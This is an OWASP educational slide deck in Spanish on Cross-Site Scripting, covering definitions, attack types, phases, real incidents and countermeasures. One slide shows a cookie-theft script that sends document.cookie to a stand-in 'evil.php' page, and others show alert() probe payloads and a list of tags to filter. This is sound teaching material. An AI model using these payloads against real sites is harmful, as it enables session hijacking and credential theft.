Ataques XSS en Aplicaciones Web Antonio Rodríguez Romero Consultor de Seguridad Grupo iSoluciones [email protected]

OWASP Education Project Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

The OWASP Foundation http://www.owasp.org

Índice 1. 2. 3. 4. 5. 6. 7. 8. 9.

Introducción Conceptos Básicos Definición de ataques XSS Tipos de ataques XSS Fases de un ataque XSS Metodologías de ataques XSS Detectar aplicación web vulnerable a ataques XSS Ejemplos de ataques XSS Contramedidas

OWASP

2

Introducción
Cross Site Scripting (XSS)  Las vulnerabilidades de XSS abarcaban cualquier ataque que permita ejecutar código de "scripting" en el contexto de otro sitio web.  Se pueden encontrar en cualquier aplicación que tenga como objetivo final, el presentar la información en un navegador web.  Usualmente no se validan correctamente los datos de entrada que son usados en algunas aplicaciones permitiendo enviar un script malicioso a la aplicación.  Para funcionar necesitan un punto de entrada, que suelen ser los formularios.  A través de un ataque XSS, se puede secuestrar cuentas, cambiar configuraciones de los usuarios, acceder a partes restringidas del sitio, modificar el contenido del sitio, etc. OWASP

3

Conceptos Básicos
Definición: Ataque  Consiste en aprovechar alguna debilidad o vulnerabilidad en el software, en el hardware, e incluso, en las personas que forman parte de un ambiente informático; a fin de obtener un beneficio, causando un efecto negativo en la seguridad del sistema, que luego repercute directamente en los activos de la organización.  Efectos negativos como:








Denegación de servicio Ejecutar código arbitrario Obtener información confidencial Escalar privilegios Administrar el sistema Tomar el control del mismo Detener o dañar el sistema informático OWASP

4

Conceptos Básicos
Tipos de Ataques Según la forma de actuación:
Ataque activo
Ataque pasivo

Según su procedencia:
Interno
Externo

OWASP

5

Conceptos Básicos
Definición: Vulnerabilidad  Hace referencia a una debilidad en un sistema, permitiendo a un atacante violar la confidencialidad, integridad, disponibilidad, control de acceso y consistencia del sistema o de sus datos y aplicaciones.  Son el resultado de bugs o de fallos en el diseño del sistema. Aunque, en un sentido más amplio, también pueden ser el resultado de las propias limitaciones tecnológicas, porque, en principio, no existe sistema 100% seguro. Por lo tanto existen vulnerabilidades teóricas y vulnerabilidades reales.  Las vulnerabilidades en las aplicaciones suelen corregirse con parches o con cambios de versión. Mientras que algunas otras requieren un cambio físico en un sistema informático. OWASP

6

Conceptos Básicos
Definición: Script  Los scripts son un conjunto de instrucciones generalmente almacenadas en un archivo de texto que deben ser interpretados línea a línea en tiempo real para su ejecución, se distinguen de los programas, pues estos deben ser convertidos a un archivo binario ejecutable.  Los scripts pueden estar embebidos en otro lenguaje para aumentar las funcionalidades de este, como es el caso los scripts PHP o Javascript en código HTML.

OWASP

7

Definición de ataque XSS
¿En qué consisten?  Es una vulnerabilidad que aprovecha la falta de mecanismos de filtrado y validación en campos de entrada, permitiendo así el envío de scripts completos (como Visual Basic Scripts o Java Scripts) con secuencias de comandos maliciosos que podrían impactar directamente en el sitio web o en el equipo de un usuario.  Esta limitación se debe a que el código HTML se interpreta en el navegador de un usuario y no en el servidor. Así que si alguien inyecta código HTML en alguna aplicación web no podría hacer daño alguno al servidor, ya que éste nunca interpreta el código HTML, sólo los navegadores. Por eso este ataque se denomina: ataque del lado del cliente.

OWASP

8

Definición de ataque XSS
¿En qué consisten?  La explotación del ataque se vale de:
Datos almacenados en servidor desde el cliente
Datos que van a ser visualizados por otros usuarios.
Campos de entradas sin protección y ningún tipo de validación
Los conocimientos del atacante sobre programación HTML y scripting

OWASP

9

Definición de ataque XSS
Riesgos Navegación dirigida Phishing Spyware Robo de credenciales Ejecución de acciones automáticas

OWASP

10

Definición de ataque XSS
Recursos para explotar la vulnerabilidad Formularios de contactos de sitios web Mensajes en Foros Firma de libro de visitas Buscadores Variables Correo Web

OWASP

11

Tipos de ataques XSS
Ataques Directos  El ataque de forma directa de XSS (también llamado XSS persistente), se presenta cuando el atacante consigue embeber código HTML malicioso, directamente en los sitios Webs que así lo permiten.  Funciona localizando puntos débiles en la programación de los filtros de HTML si es que existen, para publicar contenido.  Este tipo de ataques suele ser el más común, y el código del atacante, se basa en etiquetas HTML (del tipo o <script>), entre las cuales incluye el código malicioso. OWASP

12

Tipos de ataques XSS
Ataques Indirectos  Este tipo de ataques se presenta, cuando el código maligno se inyecta a través de formularios, a través de los parámetros de una URL, programas en Flash, un enlace malicioso e incluso vídeos.  Un ejemplo de un XSS indirecto, puede darse a través de un enlace malicioso, del tipo: http://www.AppVictima.com/search?p=<script>alert('Hola-mundo')  El resultado muestra una ventana con el texto "hola-mundo".  Esta vulnerabilidad suele ser usada para efectuar robo de sesiones y phishing.

OWASP

13

Fases de un ataque XSS

Fase 1

Fase 2

Fase 3

• Inserción de código HTML: Identificar que código puede introducir

• Pruebas de Concepto: ¿Qué puede hacer con XSS? Robo de credenciales, alterar el sitio web, etc. • Llevar a cabo el daño, robo de credenciales, suplantación de identidad, envío de emails falsos, identificación de posibles víctimas, etc.

OWASP

14

Metodologías de ataques XSS
Robo de Cookies  Mediante esta técnica se puede robar sesiones de una manera bastante sencilla. Bastaría con realizar un script que llamase a una página alojada en nuestro servidor pasándole la cookie.

<SCRIPT type="text/javascript"> var adr = '../evil.php?cookiemonster=' + escape(document.cookie);  Este Script se colaría en el servidor de la victima aprovechando un punto vulnerable a XSS. Cuando un usuario se ha validado en el servidor y ejecute el script se envía al servidor el contenido de la cookie.  Una vez que la página obtiene la cookie (almacenándola por ejemplo en un fichero) mediante programas como Odysseus, se puede hacer una llamada al servidor pasándole la cookie original.  Esta cookie es válida para robar la sesión solo mientras el usuario no cierre la sesión.

OWASP

15

Metodologías de ataques XSS
Variables

http://www..../index.html?ofertas=><script>alert( “VulnerabilidadXSS”)

OWASP

Metodologías de ataques XSS
Buscadores

OWASP

Metodologías de ataques XSS
Páginas de error

OWASP

Detectar aplicación web vulnerable a ataques XSS
Método Detectar la vulnerabilidad a través de un formulario: <script>alert();

Detectar la vulnerabilidad a través de URL: http://vulnerable.com/index.html?nombre=<script>alert();

OWASP

19

Ejemplos de ataques XSS
Phishing a la banca electrónica Por mala validación de datos de entrada, un atacante puede conseguir inyectar código, para realizar el robo de credenciales y lograr el acceso a cuentas bancarias.

OWASP

20

Ejemplos de ataques XSS
Presidencia Española de la Unión Europea Consiguen alterar la imagen de un Presidente de Gobierno con una imagen errónea, con el fin de dañar la imagen pública de un país.

OWASP

21

Ejemplos de ataques XSS
Twitter Se inyectaba código Java Script persistente, a través de un fichero .js alojado en el servidor. El cliente de Twitter no limpiaba el código que venía con las URLs OWASP

22

Ejemplos de ataques XSS
Youtube  Los atacantes lograron inyectar código HTML desde el área de comentarios en Youtube.  Los hackers hicieron de todo, desde forzar mensajes “popup” para que aparecieran en el sitio , hasta re direccionar a los usuarios a páginas con malware. OWASP

23

Ejemplos de ataques XSS
Facebook  El ataque se basaba en el acceso a través de Java Scripts, de las cookies del usuario de Facebook, logrando re direccionar su contenido a un servidor web controlado por el atacante.  Esto permitía al atacante, acceder a los mensajes privados de los usuarios, adicionar nuevas aplicaciones sin autorización, disponer de las imágenes privadas de las víctimas, robar la lista de contactos, etc. OWASP

24

Contramedidas
Diseño de aplicaciones  Validar todas las entradas de formularios: Se debe verificar que el tipo de datos y la longitud de cada campo se corresponda con lo esperado. Se deberá filtrar caracteres especiales que puedan resultar peligrosos  Se deben programar las aplicaciones web, filtrando determinados comandos. En general en los ataques XSS son usadas etiquetas como SCRIPT, OBJECT, APPLET, EMBED y FORM.  Envío de mensajes de alerta intimidatorios, cuando se detecte que un usuario de la aplicación intente un posible ataque.

OWASP

25

Contramedidas
Navegadores del lado cliente  Otra contramedida, que ayuda a mitigar los ataques XSS, evitando que los usuarios sean víctimas de ellos, es el uso de las versiones más recientes de navegadores web.  A partir de Internet Explorer 8, cuando se intenta acceder a una página web que ha sido víctima de un ataque XSS, aparece un mensaje que avisa de que la página web ha sido modificada, para proteger al usuario de un posible ataque. Esto es debido a que el filtro Anti XSS de Internet Explorer ha detectado la manipulación de la página mediante la inyección de código en un parámetro.

OWASP

26

Muchas gracias

[email protected]

OWASP

27